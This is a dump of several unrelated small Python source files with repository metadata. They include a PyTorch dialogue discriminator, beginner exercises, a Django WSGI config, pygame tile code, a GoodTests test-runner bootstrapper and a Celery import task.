d = [self.discriminate(exp).data.cpu().numpy()[0] for exp in experience]
# NOTE: be careful
if np.mean(d) < self.threshold_upperbound and np.mean(d) > self.threshold_lowerbound: # 若discriminate函数的输出处于上下界之间
return True
else:
return False
elif self.nn_type == "RNN":
# define the policy here
d = [self.discriminate(exp).data.cpu().numpy()[0][0] for exp in experience]
# NOTE: be careful
if np.mean(d) < self.threshold_upperbound and np.mean(d) > self.threshold_lowerbound:
return True
else:
return False
# 单独检查一条经验
def single_check(self, example):
d = self.discriminate(example).data.cpu().numpy()[0]
if d < self.threshold_upperbound and d > self.threshold_lowerbound:
return True
else:
return False
def discriminate(self, example):
if self.nn_type == "MLP":
state = self.prepare_state_representation(example[0])[0] # represent the state
model_input = self.Variable(torch.FloatTensor(state)) # load state representation into pytorch Variable
return self.model(model_input) # feed into MLP model
elif self.nn_type == "RNN":
inputs = self.Variable(torch.FloatTensor([self.prepare_state_representation_for_RNN(history) for history in example[0]['history']]))
h_0 = self.Variable(torch.FloatTensor(self.prepare_initial_state_for_RNN(example[0])))
c_0 = self.Variable(torch.zeros(1, 1, self.hidden_size))
output, hn = self.model(inputs, (self.transform_layer(h_0).unsqueeze(0), c_0))
return self.output_layer(output[-1])
# D(s, a) determines 'how real is the example'
def train_single_batch(self, batch_size=16):
self.optimizer.zero_grad()
loss = 0
# sample positive and negative examples
pos_experiences = random.sample(self.user_experience_pool, batch_size)
neg_experiences = random.sample(self.user_model_experience_pool, batch_size)
for pos_exp, neg_exp in zip(pos_experiences, neg_experiences):
loss += self.BCELoss(self.discriminate(pos_exp), self.Variable(torch.ones(1,1))) + self.BCELoss(self.discriminate(neg_exp), self.Variable(torch.zeros(1,1)))
loss.backward()
clip_grad_norm_(self.parameters(), self.max_norm)
self.optimizer.step()
return loss
def train(self, batch_size=16, batch_num=0): # batch_num决定训练次数
loss = 0
if batch_num == 0: # 若未指定batch_num
batch_num = min(len(self.user_experience_pool)//batch_size, len(self.user_model_experience_pool)//batch_size)
for _ in range(batch_num):
loss += self.train_single_batch(batch_size)
return (loss.data.cpu().numpy()/batch_num)
def prepare_state_representation(self, state):
""" Create the representation for each state """
user_action = state['user_action']
current_slots = state['current_slots']
agent_last = state['agent_action']
########################################################################
# Create one-hot of acts to represent the current user action
########################################################################
user_act_rep = np.zeros((1, self.act_cardinality))
user_act_rep[0, self.act_set[user_action['diaact']]] = 1.0
########################################################################
# Create bag of inform slots representation to represent the current user action
########################################################################
user_inform_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in user_action['inform_slots'].keys():
user_inform_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Create bag of request slots representation to represent the current user action
########################################################################
user_request_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in user_action['request_slots'].keys():
user_request_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Creat bag of filled_in slots based on the current_slots
########################################################################
current_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in current_slots['inform_slots']:
current_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Encode last agent act
########################################################################
agent_act_rep = np.zeros((1, self.act_cardinality))
if agent_last:
agent_act_rep[0, self.act_set[agent_last['diaact']]] = 1.0
########################################################################
# Encode last agent inform slots
########################################################################
agent_inform_slots_rep = np.zeros((1, self.slot_cardinality))
if agent_last:
for slot in agent_last['inform_slots'].keys():
agent_inform_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Encode last agent request slots
########################################################################
agent_request_slots_rep = np.zeros((1, self.slot_cardinality))
if agent_last:
for slot in agent_last['request_slots'].keys():
agent_request_slots_rep[0, self.slot_set[slot]] = 1.0
# turn_rep = np.zeros((1, 1)) + state['turn'] / 10.
turn_rep = np.zeros((1, 1))
########################################################################
# One-hot representation of the turn count?
########################################################################
turn_onehot_rep = np.zeros((1, self.max_turn))
turn_onehot_rep[0, state['turn']] = 1.0
self.final_representation = np.hstack([user_act_rep, user_inform_slots_rep, user_request_slots_rep, agent_act_rep, agent_inform_slots_rep, agent_request_slots_rep, current_slots_rep, turn_rep, turn_onehot_rep])
return self.final_representation
def prepare_initial_state_for_RNN(self, state):
user_action = state['user_action']
current_slots = state['current_slots']
agent_last = state['agent_action']
########################################################################
# Create one-hot of acts to represent the current user action
########################################################################
user_act_rep = np.zeros((1, self.act_cardinality))
user_act_rep[0, self.act_set[user_action['diaact']]] = 1.0
########################################################################
# Create bag of inform slots representation to represent the current user action
########################################################################
user_inform_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in user_action['inform_slots'].keys():
user_inform_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Create bag of request slots representation to represent the current user action
########################################################################
user_request_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in user_action['request_slots'].keys():
user_request_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Creat bag of filled_in slots based on the current_slots
########################################################################
current_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in current_slots['inform_slots']:
current_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Encode last agent act
########################################################################
agent_act_rep = np.zeros((1, self.act_cardinality))
if agent_last:
agent_act_rep[0, self.act_set[agent_last['diaact']]] = 1.0
########################################################################
# Encode last agent inform slots
########################################################################
agent_inform_slots_rep = np.zeros((1, self.slot_cardinality))
if agent_last:
for slot in agent_last['inform_slots'].keys():
agent_inform_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Encode last agent request slots
########################################################################
agent_request_slots_rep = np.zeros((1, self.slot_cardinality))
if agent_last:
for slot in agent_last['request_slots'].keys():
agent_request_slots_rep[0, self.slot_set[slot]] = 1.0
# turn_rep = np.zeros((1, 1)) + state['turn'] / 10.
turn_rep = np.zeros((1, 1))
########################################################################
# One-hot representation of the turn count?
########################################################################
turn_onehot_rep = np.zeros((1, self.max_turn))
turn_onehot_rep[0, state['turn']] = 1.0
self.final_representation = np.hstack([user_act_rep, user_inform_slots_rep, user_request_slots_rep, agent_act_rep, agent_inform_slots_rep, agent_request_slots_rep, current_slots_rep, turn_rep, turn_onehot_rep])
return self.final_representation
# {'request_slots': {'theater': 'UNK'}, 'turn': 0, 'speaker': 'user', 'inform_slots': {'numberofpeople': '3', 'moviename': '10 cloverfield lane'}, 'diaact': 'request'}
def prepare_state_representation_for_RNN(self, state):
########################################################################
# Create one-hot of acts to represent the current user action
########################################################################
user_act_rep = np.zeros((1, self.act_cardinality))
if state['speaker'] == 'user':
user_act_rep[0, self.act_set[state['diaact']]] = 1.0
########################################################################
# Create bag of inform slots representation to represent the current user action
########################################################################
user_inform_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in state['inform_slots'].keys():
user_inform_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Create bag of request slots representation to represent the current user action
########################################################################
user_request_slots_rep = np.zeros((1, self.slot_cardinality))
for slot in state['request_slots'].keys():
user_request_slots_rep[0, self.slot_set[slot]] = 1.0
########################################################################
# Encode last agent act
########################################################################
agent_act_rep = np.zeros((1, self.act_cardinality))
if state['speaker'] == 'agent':
agent_act_rep[0, self.act_set[state['diaact']]] = 1.0
turn_rep = np.zeros((1, 1))
########################################################################
# One-hot representation of the turn count?
########################################################################
turn_onehot_rep = np.zeros((1, self.max_turn))
turn_onehot_rep[0, state['turn']] = 1.0
self.final_representation = np.hstack([user_act_rep, user_inform_slots_rep, user_request_slots_rep, agent_act_rep, turn_rep, turn_onehot_rep])
return self.final_representation
|
[
"etienn3dai@gmail.com"
] |
etienn3dai@gmail.com
|
406e35ae24ec2980a846e1ed4635bfff5afb80e2
|
f96bb6344180322fbef067d611aab9cb5ceeea38
|
/Занятие2/Практические_задания/task4_1/main.py
|
d57d450b0fe7935664b2e222e8f44f7c84ae2662
|
[] |
no_license
|
Irina1207/PythonPY100
|
485247ce32e52f388d863ddd8dbc7788278e6f38
|
7525d09fc7d8e701768e3b0cc6fed111f5d2ae1a
|
refs/heads/master
| 2023-09-02T11:10:06.079356
| 2021-10-28T18:14:37
| 2021-10-28T18:14:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,387
|
py
|
if __name__ == "__main__":
list_ = [4, -1, 10, -1, 3, -3, -6, 8, 6, 9]
# предположим, что первый элемент в нашем списке минимальный
min_value = list_[0]
# а далее пройдемся по всему списку, и будем искать элемент меньший ранее найденного минимального значения
for current_value in list_:
# если текущее значение меньше минимума, то перезаписываем минимум
print("Текущее минимальное значение", min_value)
print("Текущий элемент", current_value)
# если нашли элемент меньше ранее найденного минимума, то перезаписываем его
if current_value < min_value: # TODO записать условие
print("Найден элемент меньший минимума")
min_value = current_value # TODO если нашли, то что делаем?
print("-" * 10)
# после того как пройдем по всему списку, напечатаем список и минимальный элемент
print(list_)
print("Минимальный элемент =", min_value)
|
[
"IraL122@mail.ru"
] |
IraL122@mail.ru
|
e2d5d28a24440c5334d98be69fadd9129afe7b63
|
5c4fb3edc23ae4d8c67af73c66ff806760a4f83b
|
/assignment_3mw/wsgi.py
|
02345b5583ee116e784c4fe2f57b4d6b500443bf
|
[] |
no_license
|
tomhoule/django-assignment
|
36b1ab5159e8fd9e577e09c9721902076fac3695
|
dfd9a38fd2a70a919dc0d7d503d7cdb8fd071918
|
refs/heads/master
| 2020-04-17T05:45:30.805835
| 2016-08-21T16:20:36
| 2016-08-21T16:20:36
| 66,184,562
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 406
|
py
|
"""
WSGI config for assignment_3mw project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "assignment_3mw.settings")
application = get_wsgi_application()
|
[
"tom@kafunsho.be"
] |
tom@kafunsho.be
|
259792a2153afb2d2d607239fcc9103a8d25a836
|
e767a79412c578da8515fe3dd4797e6915177633
|
/scraperBuild
|
d3e9c47dfefb290004477bd3843e17b9f0d7c062
|
[] |
no_license
|
stajama/CodingBatProject
|
38686f17aa7db993c3bfc869f6ad70ed5abb2719
|
5bc29c61ba796ad0447d8a0402600368698f5b68
|
refs/heads/master
| 2021-09-13T03:52:40.537769
| 2018-04-24T17:20:20
| 2018-04-24T17:20:20
| 105,554,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,460
|
#!/usr/bin/env python3
def descriptionFormatter(descriptionString):
out = "// "
for i in range(len(descriptionString)):
if i % 79 == 0:
out += "\n// "
out += i
return out
def mainDeal(dictOfInfo):
outFile = open('workfile.txt', "w")
outFile2 = open('testfile.txt', 'w')
for section in dictOfInfo:
outFile.write("// --- {0}\n\n\n".format(section))
# outFile2.write("// --- {0}\n\n\n".format(section))
for problem in dictOfInfo[section]:
outFile.write("// {}\n\n".format(problem))
# solution = dictOfInfo[section][problem]["solution"]
# solution = solution[ : solution.find("{") + 1] + "\n" + \
# descriptionFormatter(dictOfInfo[section][problem]["description"]) + \
# solution[solution.find("{") + 1 : ] + "\n\n"
solution = descriptionFormatter(dictOfInfo[section][problem]["description"])
outFile.write(solution)
# outFile2.write("// {}\n\n@Test\npublic void {0}Test() {\n\tAnswer answer = new Answer();\n\n".format(problem))
# for assertion in dictOfInfo[section][problem]["tests"]:
# # structure should be (function input, expected output)
# outFile2.write("\tassertEquals(answer.{0}({1}))equals({2}, \"Error in {0}\");\n")
# outFile2.write("\t}\n}\n\n")
outFile.close()
return
|
[
"stajama@yahoo.com"
] |
stajama@yahoo.com
|
|
36eeb74417934b69ae6ab04042a025ddef8be960
|
69624d985735fdb8fa6e4af620c44ca3d5719dc9
|
/ethernet_game_picture_tile_library.py
|
c05885e4815bceadf6172455a6d2d9a0daa2db85
|
[] |
no_license
|
DorsaiFeydakin/Ethernet_Pygame_Board
|
f4162b36d1648e2b0ece6f5ad50b62e796ebb87d
|
efbb274c9abf32b1e7ae417ac00adac34b76c161
|
refs/heads/master
| 2022-08-02T15:38:26.868029
| 2020-05-20T06:55:35
| 2020-05-20T06:55:35
| 265,217,096
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,775
|
py
|
#PyGame_OOPs_Programming_8
# Write your code here :-)
#ethernet_game_image/drawn objects file
import pygame
pygame.init()
window_width=800
window_height=500
WHITE = (255,255,255)
BLACK = (0,0,0)
RED = (255,0,0)
LIME = (0,255,0)
BLUE = (0,0,255)
YELLOW = (255,255,0)
CYAN = (0,255,255)
MAGENTA = (255,0,255)
SILVER = (192,192,192)
GRAY = (128,128,128)
MAROON = (128,0,0)
OLIVE = (128,128,0)
GREEN = (0,128,0)
PURPLE = (128,0,128)
TEAL = (0,128,128)
NAVY = (0,0,128)
#Origin Tile Variables
pictile_x_position = 50
pictile_y_position = 100
pictile_width = 100
pictile_height = 100
pictile_colour = BLUE
piclabel = "new"
dice_tile_x_position = 50
dice_tile_y_position = 100
dice_tile_width = 100
dice_tile_height = 100
dice_tile_colour = RED
dice_tile_label = "Go On"
class Picture_Tile(object):
def __init__(self, pictile_x_position,pictile_y_position, pictile_width, pictile_height ):
pygame.sprite.Sprite.__init__(self)
self.pictile_width = pictile_width
self.pictile_height = pictile_height
self.image = pygame.image.load("./Test_tile_image1.png")
self.image = pygame.transform.scale(self.image,(self.pictile_width,self.pictile_height))#Transform and scale functions resize a .png image
self.image_rect = self.image.get_rect()
self.image_rect.x = self.image_rect.x
self.image_rect.y = self.image_rect.y
self.rect = self.image.get_rect( )#retrieves tuple rectangle/surface data (x, y, width, height)
self.rect = (self.rect.x , self.rect.y)
#self.tile_image = pygame.Surface((self.tile_width,self.tile_height)) #Creates a Surface((width,height)) Surfaces can be hardware accelerated
#self.tile_image.fill(self.tile_colour) #fill the tile_surface with a colour (R,G,B)
#pic_tile_1 = Picture_Tile(pictile_x_position,pictile_y_position, pictile_width, pictile_height )
def Roll_It(dice_roll):
dice_roll = dice_roll
rollCount = 0
dice_list =[pygame.image.load("./Test_tile_image1.png"),
pygame.image.load("./Test_tile_image2.png"),
pygame.image.load("./Test_tile_image3.png"),
pygame.image.load("./Test_tile_image4.png"),
pygame.image.load("./Test_tile_image5.png"),
pygame.image.load("./Test_tile_image6.png") ]
if rollCount +1 >= 30:#if rollCount exceed 30 then End of Index error would occur... hence the reset
rollCount = 0 #30 frames / 6 images = 5 images per second???
if dice_roll:
window.blit(dice_list[rollCount//5], (300,300))
rollCount += 1
|
[
"noreply@github.com"
] |
DorsaiFeydakin.noreply@github.com
|
35e4c6d766829bc2ef91b3a057c4e81b72a53492
|
142c8772f894ec71e9ca78cb00842e7aaf3f497a
|
/basic-timer.py
|
63c847130e274725338ea06febe1d48b786b4b51
|
[] |
no_license
|
iamshanu14/timer
|
7e8fe83bdab055a37ce01339cec3a7df3f9921ae
|
27050dfe01e8c74dff7121253aff711f77d49c60
|
refs/heads/master
| 2022-12-07T17:38:46.364147
| 2020-09-01T08:31:23
| 2020-09-01T08:31:23
| 291,774,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 194
|
py
|
import time
for hour in range(0, 24):
for minute in range(0, 60):
for second in range(0, 60):
print("{}:{}:{}" . format(hour, minute, second))
time.sleep(1)
|
[
"66065871+shanu14@users.noreply.github.com"
] |
66065871+shanu14@users.noreply.github.com
|
7216b0c7a8159a4c9e828f2233642a74ced03bf0
|
3186db1413e39be886fa0067e102b2addd73f4d8
|
/FP/P2_GestiuneLaboratoareStudenti/main.py
|
a312f20f1510abf858d09828a6c66c4cad3d2134
|
[] |
no_license
|
elenamaria0703/MyProjects
|
516624425396814b37bfce249d4989aaabbc43a0
|
ed8c94a30c1ff9250a7d4ff2f1321b2bb598fdc6
|
refs/heads/master
| 2021-03-02T05:14:20.427516
| 2020-06-16T14:07:55
| 2020-06-16T14:07:55
| 245,840,381
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,514
|
py
|
from repo.Repository import RepositoryStudents,RepositoryProbls,RepositoryAsign
from repo.FileRepositoies import FileRepositoryStudents,FileRepositoryProbls,FileRepositoryAsign
from valid.Validators import StudentiValidator, ProblLabValidator,AsignareValidator
from business.Controllers import StudentiService, ProblLabService,AsignareService
from ui.Console import Console
from business import Controllers
#repoStudents = RepositoryStudents()
#repoProbls = RepositoryProbls()
repoStudents = FileRepositoryStudents("C:\\Users\\Maria\\eclipse-workspace\\P2_GestiuneLaboratoareStudenti.zip_expanded\\P2_GestiuneLaboratoareStudenti\\studentFile.txt")
repoProblLab = FileRepositoryProbls("C:\\Users\\Maria\\eclipse-workspace\\P2_GestiuneLaboratoareStudenti.zip_expanded\\P2_GestiuneLaboratoareStudenti\\problsFile.txt")
#repoAsignare = RepositoryAsign()
repoAsignare = FileRepositoryAsign("C:\\Users\\Maria\\eclipse-workspace\\P2_GestiuneLaboratoareStudenti.zip_expanded\\P2_GestiuneLaboratoareStudenti\\asignareFile.txt")
validatorStudenti = StudentiValidator()
validatorProblLab = ProblLabValidator()
validatorAsignare = AsignareValidator()
serviceProblLab = ProblLabService(repoProblLab,validatorProblLab)
serviceStudenti = StudentiService(repoStudents,validatorStudenti)
serviceAsignare = AsignareService(repoStudents,repoProblLab,repoAsignare,validatorAsignare)
console = Console(serviceStudenti,serviceProblLab,serviceAsignare)
#serviceStudenti.RandomStudent()
#serviceProblLab.RandomProblLab()
console.run()
|
[
"elenamaria0703@users.noreply.github.com"
] |
elenamaria0703@users.noreply.github.com
|
6dd73fa6654aafaa3eb2674d985b5cc5983539da
|
f6a9b8f5aea2a68294e93b396eb9d0bc6755403c
|
/tests/runTests.py
|
00a390aaadeb529599567d6bb4fa00370a42a7bc
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
knu2xs/cmp_version
|
e6b51c230e6914e5ed0f6d57d801b90f1ec8e674
|
bc295e175040684308bcc24c56ee8761825adeed
|
refs/heads/master
| 2022-01-08T22:00:26.290274
| 2018-04-18T00:41:48
| 2018-04-18T00:41:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,768
|
py
|
#!/usr/bin/env python
#
# Copyright (c) 2015, 2016, 2017 Tim Savannah under following terms:
# You may modify and redistribe this script with your project
#
# It will download the latest GoodTests.py and use it to execute the tests.
#
# This should be placed in a directory, "tests", at the root of your project. It assumes that ../$MY_PACKAGE_MODULE is the path to your test module, and will create a symlink to it in order to run tests.
# The tests should be found in $MY_TEST_DIRECTORY in given "tests" folder.
# NOTE: Since version 1.2.3, you can also import this (like from a graphical application) and call the "main()" function.
# All of the following globals are the defaults, but can be overridden when calling main() (params have the same name as the globals).
import imp
import os
import subprocess
import sys
# URL to current version of GoodTests.py - You only need to change this if you host an internal copy.
GOODTESTS_URL = 'https://raw.githubusercontent.com/kata198/GoodTests/master/GoodTests.py'
# This should be your module name, and can be any relative or absolute path, or just a module name.
# If just a module name is given, the directory must be in current directory or parent directory.
MY_PACKAGE_MODULE = 'cmp_version'
# Normally, you want to test the codebase during development, so you don't care about the site-packages installed version.
# If you want to allow testing with any module by @MY_PACKAGE_MODULE in the python path, change this to True.
ALLOW_SITE_INSTALL = False
# This is the test directory that should contain all your tests. This should be a directory in your "tests" folder
MY_TEST_DIRECTORY = 'cmp_version_Tests'
__version__ = '2.2.0'
__version_tuple__ = (2, 2, 0)
def findGoodTests():
'''
findGoodTests - Tries to find GoodTests.py
@return <dict> {
'path' <str> -> Path to GoodTests.py (for execution)
'success' <bool> -> True/False if we successfully found GoodTests.py
}
'''
pathSplit = os.environ['PATH'].split(':')
if '.' not in pathSplit:
pathSplit = ['.'] + pathSplit
os.environ['PATH'] = ':'.join(pathSplit)
result = ''
success = False
for path in pathSplit:
if path.endswith('/'):
path = path[:-1]
guess = path + '/GoodTests.py'
if os.path.exists(guess):
success = True
result = guess
break
return {
'path' : result,
"success" : success
}
def findExecutable(execName):
'''
findExecutable - Search PATH for an executable
@return <dict> {
'path' <str> -> Path to executable (if found, see "success")
'success' <bool> -> True/False if we successfully found requested executable
}
'''
pathSplit = os.environ['PATH'].split(':')
if '.' not in pathSplit:
pathSplit = ['.'] + pathSplit
os.environ['PATH'] = ':'.join(pathSplit)
result = ''
success = False
for path in pathSplit:
if path.endswith(os.sep):
path = path[:-1]
guess = path + os.sep + execName
if os.path.exists(guess):
success = True
result = guess
break
return {
"path" : result,
"success" : success
}
def findGoodTests():
return findExecutable('GoodTests.py')
def try_pip_install():
'''
try to pip install GoodTests.py
First, try via pip module.
If that fails, try to locate pip by dirname(current python executable) + os.sep + pip
If that does not exist, scan PATH for pip
If found a valid pip executable, invoke it to install GoodTests
otherwise, fail.
'''
didImport = False
try:
import pip
didImport = True
except:
pass
if didImport is True:
print ( "Found pip as module=pip")
res = pip.main(['install', 'GoodTests'])
if res == 0:
return 0
sys.stderr.write('Failed to install GoodTests via pip module. Falling back to pip executable...\n\n')
pipPath = os.path.dirname(sys.executable) + os.sep + 'pip'
print ( 'Searching for pip at "%s"' %(pipPath, ) )
if not os.path.exists(pipPath):
print ( '"%s" does not exist. Scanning PATH to locate a usable pip executable' %(pipPath, ))
pipPath = None
searchResults = findExecutable('pip')
if not searchResults['success']:
sys.stderr.write('Failed to find a usable pip executable in PATH.\n')
return 1 # Failed to locate a usable pip
pipPath = searchResults['path']
print ( 'Found pip executable at "%s"' %(pipPath, ) )
print ( "Executing: %s %s 'install' 'GoodTests'" %(sys.executable, pipPath) )
pipe = subprocess.Popen([sys.executable, pipPath, 'install', 'GoodTests'], shell=False, env=os.environ)
res = pipe.wait()
return res
def download_goodTests(GOODTESTS_URL=None):
'''
download_goodTests - Attempts to download GoodTests, using the default global url (or one provided).
@return <int> - 0 on success (program should continue), otherwise non-zero (program should abort with this exit status)
'''
if GOODTESTS_URL is None:
GOODTESTS_URL = globals()['GOODTESTS_URL']
validAnswer = False
while validAnswer == False:
sys.stdout.write('GoodTests not found. Would you like to install it to local folder? (y/n): ')
sys.stdout.flush()
answer = sys.stdin.readline().strip().lower()
if answer not in ('y', 'n', 'yes', 'no'):
continue
validAnswer = True
answer = answer[0]
if answer == 'n':
sys.stderr.write('Cannot run tests without installing GoodTests. http://pypi.python.org/pypi/GoodTests or https://github.com/kata198/Goodtests\n')
return 1
try:
import urllib2 as urllib
except ImportError:
try:
import urllib.request as urllib
except:
sys.stderr.write('Failed to import urllib. Trying pip.\n')
res = try_pip_install()
if res != 0:
sys.stderr.write('Failed to install GoodTests with pip or direct download. aborting.\n')
return 1
try:
response = urllib.urlopen(GOODTESTS_URL)
contents = response.read()
if str != bytes:
contents = contents.decode('ascii')
except Exception as e:
sys.stderr.write('Failed to download GoodTests.py from "%s"\n%s\n' %(GOODTESTS_URL, str(e)))
sys.stderr.write('\nTrying pip.\n')
res = try_pip_install()
if res != 0:
sys.stderr.write('Failed to install GoodTests with pip or direct download. aborting.\n')
return 1
try:
with open('GoodTests.py', 'w') as f:
f.write(contents)
except Exception as e:
sys.stderr.write('Failed to write to GoodTests.py\n%s\n' %(str(e,)))
return 1
try:
os.chmod('GoodTests.py', 0o775)
except:
sys.stderr.write('WARNING: Failed to chmod +x GoodTests.py, may not be able to be executed.\n')
try:
import GoodTests
except ImportError:
sys.stderr.write('Seemed to download GoodTests okay, but still cannot import. Aborting.\n')
return 1
return 0
def main(thisDir=None, additionalArgs=[], MY_PACKAGE_MODULE=None, ALLOW_SITE_INSTALL=None, MY_TEST_DIRECTORY=None, GOODTESTS_URL=None):
'''
Do the work - Try to find GoodTests.py, else prompt to download it, then run the tests.
@param thisDir <None/str> - None to use default (directory this test file is in, or if not obtainable, current directory).
@param additionalArgs <list> - Any additional args to pass to GoodTests.py
Remainder of params take their global (top of file) defaults unless explicitly set here. See top of file for documentation.
@return <int> - Exit code of application. 0 on success, non-zero on failure.
TODO: Standardize return codes so external applications can derive failure without parsing error strings.
'''
if MY_PACKAGE_MODULE is None:
MY_PACKAGE_MODULE = globals()['MY_PACKAGE_MODULE']
if ALLOW_SITE_INSTALL is None:
ALLOW_SITE_INSTALL = globals()['ALLOW_SITE_INSTALL']
if MY_TEST_DIRECTORY is None:
MY_TEST_DIRECTORY = globals()['MY_TEST_DIRECTORY']
if GOODTESTS_URL is None:
GOODTESTS_URL = globals()['GOODTESTS_URL']
if not thisDir:
thisDir = os.path.dirname(__file__)
if not thisDir:
thisDir = str(os.getcwd())
elif not thisDir.startswith('/'):
thisDir = str(os.getcwd()) + '/' + thisDir
# If GoodTests is in current directory, make sure we find it later
if os.path.exists('./GoodTests.py'):
os.environ['PATH'] = str(os.getcwd()) + ':' + os.environ['PATH']
os.chdir(thisDir)
goodTestsInfo = findGoodTests()
if goodTestsInfo['success'] is False:
downloadRet = download_goodTests(GOODTESTS_URL)
if downloadRet != 0:
return downloadRet
goodTestsInfo = findGoodTests()
if goodTestsInfo['success'] is False:
sys.stderr.write('Could not download or find GoodTests.py. Try to download it yourself using "pip install GoodTests", or wget %s\n' %( GOODTESTS_URL,))
return 1
baseName = os.path.basename(MY_PACKAGE_MODULE)
dirName = os.path.dirname(MY_PACKAGE_MODULE)
newPath = None
if dirName not in ('.', ''):
if dirName.startswith('.'):
dirName = os.getcwd() + os.sep + dirName + os.sep
newPath = dirName
elif dirName == '':
inCurrentDir = False
try:
imp.find_module(MY_PACKAGE_MODULE)
inCurrentDir = True
except ImportError:
# COMPAT WITH PREVIOUS runTests.py: Try plain module in parent directory
foundIt = False
oldSysPath = sys.path[:]
sys.path = [os.path.realpath(os.getcwd() + os.sep + '..' + os.sep)]
try:
imp.find_module(MY_PACKAGE_MODULE)
foundIt = True
sys.path = oldSysPath
except ImportError as e:
sys.path = oldSysPath
if not ALLOW_SITE_INSTALL:
sys.stderr.write('Cannot find "%s" locally.\n' %(MY_PACKAGE_MODULE,))
return 2
else:
try:
__import__(baseName)
except:
sys.stderr.write('Cannot find "%s" locally or in global python path.\n' %(MY_PACKAGE_MODULE,))
return 2
if foundIt is True:
newPath = os.path.realpath(os.getcwd() + os.sep + '..' + os.sep)
if inCurrentDir is True:
newPath = os.path.realpath(os.getcwd() + os.sep + '..' + os.sep)
if newPath:
newPythonPath = [newPath] + [x for x in os.environ.get('PYTHONPATH', '').split(':') if x]
os.environ['PYTHONPATH'] = ':'.join(newPythonPath)
sys.path = [newPath] + sys.path
try:
__import__(baseName)
except ImportError as e:
if baseName.endswith(('.py', '.pyc', '.pyo')):
MY_PACKAGE_MODULE = baseName[ : baseName.rindex('.')]
if e.name != MY_PACKAGE_MODULE:
sys.stderr.write('Error while importing %s: %s\n Likely this is another dependency that needs to be installed\nPerhaps run "pip install %s" or install the providing package.\n\n' %(e.name, str(e), e.name))
return 1
sys.stderr.write('Could not import %s. Either install it or otherwise add to PYTHONPATH\n%s\n' %(MY_PACKAGE_MODULE, str(e)))
return 1
if not os.path.isdir(MY_TEST_DIRECTORY):
if not os.path.exists(MY_TEST_DIRECTORY):
sys.stderr.write('Cannot find test directory: %s\n' %(MY_TEST_DIRECTORY,))
else:
sys.stderr.write('Provided test directory, "%s" is not a directory.\n' %(MY_TEST_DIRECTORY,))
return 3
sys.stdout.write('Starting test..\n')
sys.stdout.flush()
sys.stderr.flush()
didTerminate = False
pipe = subprocess.Popen([sys.executable, goodTestsInfo['path']] + additionalArgs + [MY_TEST_DIRECTORY], env=os.environ, shell=False)
while True:
try:
pipe.wait()
break
except KeyboardInterrupt:
if not didTerminate:
pipe.terminate()
didTerminate = True
else:
pipe.kill()
break
return 0
if __name__ == '__main__':
ret = main(None, sys.argv[1:])
sys.exit(ret)
|
[
"kata198@gmail.com"
] |
kata198@gmail.com
|
9acbe81faeeff0ecc0cb9f08878565903c2b7b02
|
b7c994da6d0f9f70e72f6d075e5881fa6dce1300
|
/interview-prep/is_balanced.py
|
90f76be32b37676bbde3daad4f2437279fd500cd
|
[] |
no_license
|
sagunji/100DaysOfCode
|
8754adc4f3e6b1307795db443356e7b7a308ed69
|
3ad284f46896eaa30d754ee312e15bdd9e8fd9b4
|
refs/heads/master
| 2021-06-20T13:11:28.966632
| 2021-03-17T15:00:30
| 2021-03-17T15:00:30
| 196,589,092
| 0
| 0
| null | 2019-10-31T18:16:24
| 2019-07-12T14:00:49
|
Python
|
UTF-8
|
Python
| false
| false
| 591
|
py
|
def isBalanced(s):
stack = []
top = -1
imbalance = False
for c in s:
if c == "(" or c == "{" or c == "[":
stack.append(c)
top += 1
elif top >= 0 and (
(c == ")" and stack[top] == "(")
or (c == "}" and stack[top] == "{")
or (c == "]" and stack[top] == "[")
):
stack.pop()
top -= 1
else:
imbalance = True
break
if not imbalance:
return "YES" if top < 0 else "NO"
else:
return "NO"
print(isBalanced("{{}}]"))
|
[
"karanjit.sagun01@gmail.com"
] |
karanjit.sagun01@gmail.com
|
945ac396d9fc4880563572cadd72d644c4d95832
|
2c8ab05ba9cbb9307b4efc034054ff4253bb3b9c
|
/src/tracks/tasks.py
|
6a369b2b9aa8a4376d4e0e6975f54141f750fb5b
|
[] |
no_license
|
La0/runreport
|
a76bff526b2b0c0474bfee4ec7850ddbbb6bfd9f
|
1d40035460ced334313ea1b917532051207e5dcb
|
refs/heads/master
| 2023-04-01T22:01:49.583951
| 2017-05-12T12:37:05
| 2017-05-12T12:37:05
| 8,062,434
| 0
| 0
| null | 2021-04-11T16:00:39
| 2013-02-06T23:18:30
|
Python
|
UTF-8
|
Python
| false
| false
| 956
|
py
|
from __future__ import absolute_import
from celery import shared_task, task
import logging
logger = logging.getLogger('tracks.tasks')
@shared_task
def tracks_import(*args, **kwargs):
'''
Import all new Tracks
'''
from users.models import Athlete
from tracks.providers import all_providers
users = Athlete.objects.all()
users = users.order_by('pk')
for user in users:
for provider in all_providers(user):
if not provider.is_connected() or provider.is_locked:
continue
# Start a subtask per import
